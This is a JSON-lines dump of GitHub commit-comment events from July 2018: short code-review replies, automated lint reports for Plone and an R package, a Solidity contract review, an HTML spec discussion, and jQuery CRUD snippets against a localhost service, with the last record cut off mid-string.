{"id":"7911319781","type":"CommitCommentEvent","actor":{"login":"Elavrenov"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29577711,"position":12,"line":12,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-03T09:23:16Z","updated_at":"2018-07-03T09:23:16Z","author_association":"OWNER","body":"исправил"}},"created_at":"2018-07-03T09:23:16Z"}
{"id":"7911321062","type":"CommitCommentEvent","actor":{"login":"Elavrenov"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29577714,"position":32,"line":32,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-03T09:23:30Z","updated_at":"2018-07-03T09:23:30Z","author_association":"OWNER","body":"исправил\r\n"}},"created_at":"2018-07-03T09:23:30Z"}
{"id":"7911322321","type":"CommitCommentEvent","actor":{"login":"Elavrenov"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29577721,"position":36,"line":36,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-03T09:23:43Z","updated_at":"2018-07-03T09:23:43Z","author_association":"OWNER","body":"сделано"}},"created_at":"2018-07-03T09:23:43Z"}
{"id":"7911323867","type":"CommitCommentEvent","actor":{"login":"Elavrenov"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29577727,"position":61,"line":61,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-03T09:24:00Z","updated_at":"2018-07-03T09:24:00Z","author_association":"OWNER","body":"исправил"}},"created_at":"2018-07-03T09:24:00Z"}
{"id":"7911325291","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577732,"position":66,"line":116,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-03T09:24:14Z","updated_at":"2018-07-03T09:24:14Z","author_association":"NONE","body":"Looking at your use of variables, you could do:\r\n\r\n```solidity\r\nfunction twice(uint amount) internal pure returns (uint twiceVal) {\r\n    twiceVal = amount * 2;\r\n    assert(twiceVal > amount);\r\n// No need to return anything\r\n}\r\n```"}},"created_at":"2018-07-03T09:24:14Z"}
{"id":"7911350039","type":"CommitCommentEvent","actor":{"login":"fawmms"},"repo":{"name":"tscmms/codestar-test"},"payload":{"comment":{"id":29577778,"position":null,"line":null,"path":null,"commit_id":"a98fb9fa197ae8f4177ce024d052af91f296f152","created_at":"2018-07-03T09:28:35Z","updated_at":"2018-07-03T09:28:35Z","author_association":"NONE","body":"also da sind mindestens 20 Schreibfehler in der Codezeile :-)"}},"created_at":"2018-07-03T09:28:35Z"}
{"id":"7911351906","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29577782,"position":null,"line":null,"path":null,"commit_id":"f3b70b9619af94f66c58622ed4a16197b1c91a7f","created_at":"2018-07-03T09:28:56Z","updated_at":"2018-07-03T09:28:56Z","author_association":"OWNER","body":"#13 "}},"created_at":"2018-07-03T09:28:56Z"}
{"id":"7911352679","type":"CommitCommentEvent","actor":{"login":"kayokina"},"repo":{"name":"kayokina/machine-learning"},"payload":{"comment":{"id":29577784,"position":null,"line":null,"path":null,"commit_id":"e6c3cbafe32d94e5d03cb142ecaf45550849091c","created_at":"2018-07-03T09:29:04Z","updated_at":"2018-07-03T09:29:04Z","author_association":"OWNER","body":"1) Decision Tree model\r\n2) Deep-Learning ANN model"}},"created_at":"2018-07-03T09:29:04Z"}
{"id":"7911354478","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29577790,"position":26,"line":210,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-03T09:29:24Z","updated_at":"2018-07-03T09:29:24Z","author_association":"OWNER","body":"ok ispravil no est odno no: kogda pytayus udalit wgon pocemu to verny argument peredanny na udalenya - programma ne mozhet udalit i vyvodit sms ot else.....hotya argument verny....v chem mozhet byt prichina?"}},"created_at":"2018-07-03T09:29:24Z"}
{"id":"7911358696","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577798,"position":131,"line":131,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:30:11Z","updated_at":"2018-07-03T09:30:11Z","author_association":"NONE","body":"Ouch! I guess player1 never loses:\r\n\r\n* player1 initiates game\r\n* player2 bets with hash\r\n* player2 reveals\r\n* case 1: player1 now sees they lose, so they wait for the refund time and refund\r\n* case 2: player1 now sees they win, so they reveal"}},"created_at":"2018-07-03T09:30:11Z"}
{"id":"7911360168","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":29577801,"position":null,"line":null,"path":null,"commit_id":"4a81288cdd6aeae36df38673b2a12b7407b99a8e","created_at":"2018-07-03T09:30:25Z","updated_at":"2018-07-03T09:30:25Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.namedfile/91/violations\n```\nplone/namedfile/testing.py:18:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/namedfile/testing.py:22:36: C812 missing trailing comma\nplone/namedfile/file.py:267:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/file.py:308:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/handler.py:11:23: C812 missing trailing comma\nplone/namedfile/interfaces.py:17:25: C812 missing trailing comma\nplone/namedfile/scaling.py:193:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:196:5: C901 'DefaultImageScalingFactory.__call__' is too complex (15)\nplone/namedfile/scaling.py:203:25: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:243:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:407:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:434:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:446:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:460:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:486:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:500:17: C816 missing trailing comma in Python 3.6+\nplone/namedfile/utils/__init__.py:84:66: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:151:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:156:73: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:176:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:183:18: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:188:1: C901 'rotate_image' is too complex (20)\nplone/namedfile/utils/__init__.py:219:14: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:271:25: F821 undefined name 'StringIO'\nplone/namedfile/utils/__init__.py:276:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/__init__.py:280:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/tiff_utils.py:11:1: C901 'process_tiff' is too complex (11)\nplone/namedfile/utils/tiff_utils.py:20:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:81:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:82:7: T000 Todo note found.\nplone/namedfile/tests/test_blobfile.py:40:31: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:45:35: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:50:46: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:55:32: C812 missing trailing comma\nplone/namedfile/tests/test_scaling.py:85:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:102:80: E501 line too long (81 > 79 characters)\nplone/namedfile/tests/test_scaling.py:133:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:156:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:178:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:200:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_image.py:25:80: E501 line too long (80 > 79 characters)\nplone/namedfile/tests/test_doctests.py:27:20: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:43:51: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:45:10: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:116:28: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:146:70: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:153:76: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:164:74: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:197:75: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:202:78: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-03T09:30:25Z"}
{"id":"7911362204","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29577804,"position":278,"line":514,"path":"tests/qgraph/test-qgraph.c","commit_id":"1bcb88e173970ab3e1c2362ee631e64691b1eb02","created_at":"2018-07-03T09:30:47Z","updated_at":"2018-07-03T09:30:47Z","author_association":"OWNER","body":"the only reason why it is needed is the assertion made in libqos/pci-pc.c, function `qpci_set_pc()` (or in the qemu source, `qpci_init_pc()`). There is an assertion that checks the QTestState is not null. If I don't start the machine, global_qtest will be NULL (since I pass that as pointer), and when the constructor will be called the assertion will fail. Either I get rid of that assert, or I can give it a pointer that is simply not null. \r\nWhat should I do? \r\n"}},"created_at":"2018-07-03T09:30:47Z"}
{"id":"7911366300","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29577811,"position":33,"line":215,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-03T09:31:30Z","updated_at":"2018-07-03T09:31:30Z","author_association":"OWNER","body":"Da vse verno ne rabotaet vyshe opisal problemu"}},"created_at":"2018-07-03T09:31:30Z"}
{"id":"7911366672","type":"CommitCommentEvent","actor":{"login":"Aloki"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29577812,"position":null,"line":null,"path":null,"commit_id":"ec09a23d3dea29cba11c755d30c648a2c5d06488","created_at":"2018-07-03T09:31:34Z","updated_at":"2018-07-03T09:31:34Z","author_association":"NONE","body":"CUSTOM_LOG_BASENAME должен иметь вид \"/var/log/miner/custom/mysuperminer\"."}},"created_at":"2018-07-03T09:31:34Z"}
{"id":"7911376505","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29577848,"position":null,"line":null,"path":null,"commit_id":"de10cd60fdd463d673b4900f4e734c71cf9c718d","created_at":"2018-07-03T09:33:21Z","updated_at":"2018-07-03T09:33:21Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:65:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-comorbid-maps-icd10.R#L65) *style:* **Lines should not be more than 120 characters.**\n```r\n​    chf = c(\"I099\", \"I110\", \"I130\", \"I132\", \"I255\", \"I420\", \"I425\", \"I426\", \"I427\", \"I428\", \"I429\", \"I43\", \"I50\", \"P290\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:66:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-comorbid-maps-icd10.R#L66) *style:* **Lines should not be more than 120 characters.**\n```r\n​    arrhythmia = c(\"I441\", \"I442\", \"I443\", \"I456\", \"I459\", \"I47\", \"I48\", \"I49\", \"R000\", \"R001\", \"R008\", \"T821\", \"Z450\", \"Z950\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:145:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L145) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                 icd_children.icd9(short_code = TRUE, \"00320\", defined = TRUE), defined = TRUE), \"00320\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:167:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L167) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                 icd_children.icd9(short_code = TRUE, \"E800\", defined = FALSE), defined = FALSE), \"E800\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:170:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L170) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"003\", short_code = FALSE, defined = FALSE), defined = FALSE), \"003\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:174:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L174) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"410\", defined = FALSE), defined = FALSE), \"410\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:176:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L176) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"V12\", short_code = FALSE, defined = FALSE), defined = FALSE), \"V12\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:178:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L178) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"E800\", defined = FALSE), defined = FALSE), \"E800\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:181:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L181) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"003.2\", short_code = FALSE, defined = FALSE), defined = FALSE),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:187:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L187) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"410.0\", defined = FALSE), defined = FALSE), \"410.0\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:189:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L189) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"V12\", short_code = FALSE, defined = FALSE), defined = FALSE), \"V12\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:191:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L191) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"E800\", defined = FALSE), defined = FALSE), \"E800\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:194:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/tests-deprecated/test-condense.R#L194) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                 icd_children.icd9(short_code = TRUE, \"0031\", defined = FALSE), defined = FALSE), \"0031\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-comorbid-maps-icd10.R:126:1:](https://github.com/jackwasey/icd/blob/de10cd60fdd463d673b4900f4e734c71cf9c718d/tests/testthat/test-comorbid-maps-icd10.R#L126) *style:* **Lines should not be more than 120 characters.**\n```r\n​                 info = paste(\"checking quan elix canonical in indep_kids: \", i, \" - \", names(quan_elix_independent)[i]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-03T09:33:21Z"}
{"id":"7911383048","type":"CommitCommentEvent","actor":{"login":"lamuert3"},"repo":{"name":"lamuert3/Projects"},"payload":{"comment":{"id":29577862,"position":null,"line":null,"path":null,"commit_id":"68492e19271b081cbd88a799c03bcf141b44da05","created_at":"2018-07-03T09:34:34Z","updated_at":"2018-07-03T09:34:34Z","author_association":"OWNER","body":"C++ folder"}},"created_at":"2018-07-03T09:34:34Z"}
{"id":"7911385016","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":29577868,"position":null,"line":null,"path":null,"commit_id":"4e9c466713c4ce8e07a55effaf2a6f4bfd42669c","created_at":"2018-07-03T09:34:54Z","updated_at":"2018-07-03T09:34:54Z","author_association":"MEMBER","body":"Then I’m confused by the example. Can you elaborate? What special meaning does `<\\script>` (as opposed to `</script>`) have?"}},"created_at":"2018-07-03T09:34:54Z"}
{"id":"7911387271","type":"CommitCommentEvent","actor":{"login":"mtbc"},"repo":{"name":"ome/bio-formats-documentation"},"payload":{"comment":{"id":29577875,"position":null,"line":null,"path":null,"commit_id":"dbef2450e67c3c0da8238e544deaeca7b58c26b5","created_at":"2018-07-03T09:35:18Z","updated_at":"2018-07-03T09:35:18Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-03T09:35:18Z"}
{"id":"7911393652","type":"CommitCommentEvent","actor":{"login":"teg"},"repo":{"name":"dvdhrm/dbus-broker"},"payload":{"comment":{"id":29577887,"position":45,"line":267,"path":"src/launch/main.c","commit_id":"3dfcbfa8a68c8f933100ea14dc71627fd677239a","created_at":"2018-07-03T09:36:28Z","updated_at":"2018-07-03T09:36:28Z","author_association":"NONE","body":"Ah, I forgot that error_fold(0) is a noop. All good."}},"created_at":"2018-07-03T09:36:28Z"}
{"id":"7911393944","type":"CommitCommentEvent","actor":{"login":"stashinskii"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29577888,"position":70,"line":74,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-03T09:36:31Z","updated_at":"2018-07-03T09:36:31Z","author_association":"OWNER","body":"done - CustomTruncate был удален уже в следующем коммите ещё до проверки"}},"created_at":"2018-07-03T09:36:31Z"}
{"id":"7911394514","type":"CommitCommentEvent","actor":{"login":"stashinskii"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29577891,"position":88,"line":92,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-03T09:36:36Z","updated_at":"2018-07-03T09:36:36Z","author_association":"OWNER","body":"done - CustomTruncate был удален уже в следующем коммите ещё до проверки"}},"created_at":"2018-07-03T09:36:36Z"}
{"id":"7911398908","type":"CommitCommentEvent","actor":{"login":"gx3541"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29577902,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T09:37:24Z","updated_at":"2018-07-03T09:37:24Z","author_association":"NONE","body":"[中文]\r\n請各位不要在這裡張貼有關有用資訊及連結\r\n如閣下有需要請自行以電郵互相交流\r\n多謝合作"}},"created_at":"2018-07-03T09:37:24Z"}
{"id":"7911399078","type":"CommitCommentEvent","actor":{"login":"ArkYk"},"repo":{"name":"Sketchpadshare/Sketchpad-407"},"payload":{"comment":{"id":29577903,"position":null,"line":null,"path":null,"commit_id":"b70ddd8f9c66c758f231c0f83ec94dbf8c6f4c38","created_at":"2018-07-03T09:37:26Z","updated_at":"2018-07-03T09:37:26Z","author_association":"NONE","body":"."}},"created_at":"2018-07-03T09:37:26Z"}
{"id":"7911400313","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":29577907,"position":null,"line":null,"path":null,"commit_id":"4e9c466713c4ce8e07a55effaf2a6f4bfd42669c","created_at":"2018-07-03T09:37:40Z","updated_at":"2018-07-03T09:37:40Z","author_association":"MEMBER","body":"Oh, I see. The intent is to have `<script>` be part of the string, and the `\\s` is just an escape for `s`. Seeing it in the context of “`<\\script>`” threw me off."}},"created_at":"2018-07-03T09:37:40Z"}
{"id":"7911403972","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":29577915,"position":null,"line":null,"path":null,"commit_id":"4e9c466713c4ce8e07a55effaf2a6f4bfd42669c","created_at":"2018-07-03T09:38:18Z","updated_at":"2018-07-03T09:38:18Z","author_association":"MEMBER","body":"Since this is the most recent HEAD commit, can we just `git reset HEAD~1 --hard; git push --force-with-lease` to undo it?"}},"created_at":"2018-07-03T09:38:18Z"}
{"id":"7911409291","type":"CommitCommentEvent","actor":{"login":"PradeepEnterPi"},"repo":{"name":"PradeepEnterPi/XYPlot"},"payload":{"comment":{"id":29577928,"position":null,"line":null,"path":null,"commit_id":"214f215932143bd78b575cec6b28e48bdb804d98","created_at":"2018-07-03T09:39:10Z","updated_at":"2018-07-03T09:39:10Z","author_association":"OWNER","body":"Pradeep Chalapaka"}},"created_at":"2018-07-03T09:39:10Z"}
{"id":"7911414729","type":"CommitCommentEvent","actor":{"login":"javamahendra"},"repo":{"name":"javamahendra/Praveen-Spring-Rest-Java-Rest-Service--CURD-Project"},"payload":{"comment":{"id":29577944,"position":null,"line":null,"path":null,"commit_id":"303408c7c6fa5e4db94eb3c17b8429bd4f6928cf","created_at":"2018-07-03T09:40:09Z","updated_at":"2018-07-03T09:40:09Z","author_association":"OWNER","body":"\r\n<script type=\"text/javascript\">\r\n+\t$(document).ready(function() {\r\n+\t\t$(\"#btnDelete\").click(deleteEmpRecord);\r\n+\t});\r\n+\tfunction deleteEmpRecord() {\r\n+\r\n+\t\t$.ajax({\r\n+\t\t\ttype : 'DELETE',\r\n+\t\t\turl : 'http://localhost:8002/RESTDBLab1/rest/emp/employee/'+ $('#deleteId').val(),\r\n+\t\t\tsuccess : function(data) {\r\n+\t\t\t\talert('Employee Record deleted successfully');\r\n+\t\t\t},\r\n+\t\t\terror : function(jqXHR, textStatus, errorThrown) {\r\n+\t\t\t\talert('Employee Record error');\r\n+\t\t\t}\r\n+\t\t});\r\n+\t}\r\n+</script>\r\n+\r\n+<body>\r\n+\r\n+\r\n+\t<input id=\"deleteId\" name=\"id\" type=\"text\" />\r\n+\r\n+\t<button id=\"btnDelete\">Delete</button>\r\n+\r\n+\r\n+</body>\r\n\r\n------------------------------------------------\r\n\r\n<script type=\"text/javascript\">\r\n+\t$(document).ready(function() {\r\n+\t\t$(\"#btnSubmit\").click(addEmpRecord);\r\n+\r\n+\t});\r\n+\tfunction addEmpRecord() {\r\n+\r\n+\t\t$.ajax({\r\n+\t\t\ttype : 'POST',\r\n+\t\t\tcontentType : 'application/json',\r\n+\t\t\turl : 'http://localhost:8002/RESTDBLab1/rest/emp/employee/',\r\n+\t\t\tdataType : \"json\",\r\n+\t\t\tdata : formToJSON(),\r\n+\t\t\tsuccess : function(data) {\r\n+\t\t\t\talert('Employee Record inserted successfully');\r\n+\t\t\t\tconsole.log(data);\r\n+\t\t\t},\r\n+\t\t\terror : function(jqXHR, textStatus, errorThrown) {\r\n+\t\t\t\talert('Employee Record error');\r\n+\t\t\t}\r\n+\t\t});\r\n+\t}\r\n+\r\n+\tfunction formToJSON() {\r\n+\r\n+\t\treturn JSON.stringify({\r\n+\r\n+\t\t\t\"name\" : $('#empName').val(),\r\n+\t\t\t\"designation\" : $('#empDesignation').val(),\r\n+\t\t\t\"salary\" : $('#empSalary').val(),\r\n+\t\t\t\"address\" : {\r\n+\t\t\t\t\"doorno\" : $('#empDoorno').val(),\r\n+\t\t\t\t\"street\" : $('#empStreet').val(),\r\n+\t\t\t\t\"location\" : $('#empLocation').val(),\r\n+\t\t\t\t\"city\" : $('#empCity').val()\r\n+\t\t\t}\r\n+\t\t});\r\n+\t\t\r\n+\r\n+\t}\r\n+</script>\r\n+\r\n+<body>\r\n+\r\n+\r\n+\tName:\r\n+\t<input id=\"empName\" name=\"id\" type=\"text\" />\r\n+\t<br /> Designation:\r\n+\t<input id=\"empDesignation\" name=\"design\" type=\"text\" />\r\n+\t<br /> Salary:\r\n+\t<input id=\"empSalary\" name=\"sal\" type=\"text\" />\r\n+\t<br /> Door Number:\r\n+\t<input id=\"empDoorno\" name=\"doorNo\" type=\"text\" />\r\n+\t<br /> Street:\r\n+\t<input id=\"empStreet\" name=\"street\" type=\"text\" />\r\n+\t<br /> Location:\r\n+\t<input id=\"empLocation\" name=\"loc\" type=\"text\" />\r\n+\t<br /> City:\r\n+\t<input id=\"empCity\" name=\"city\" type=\"text\" 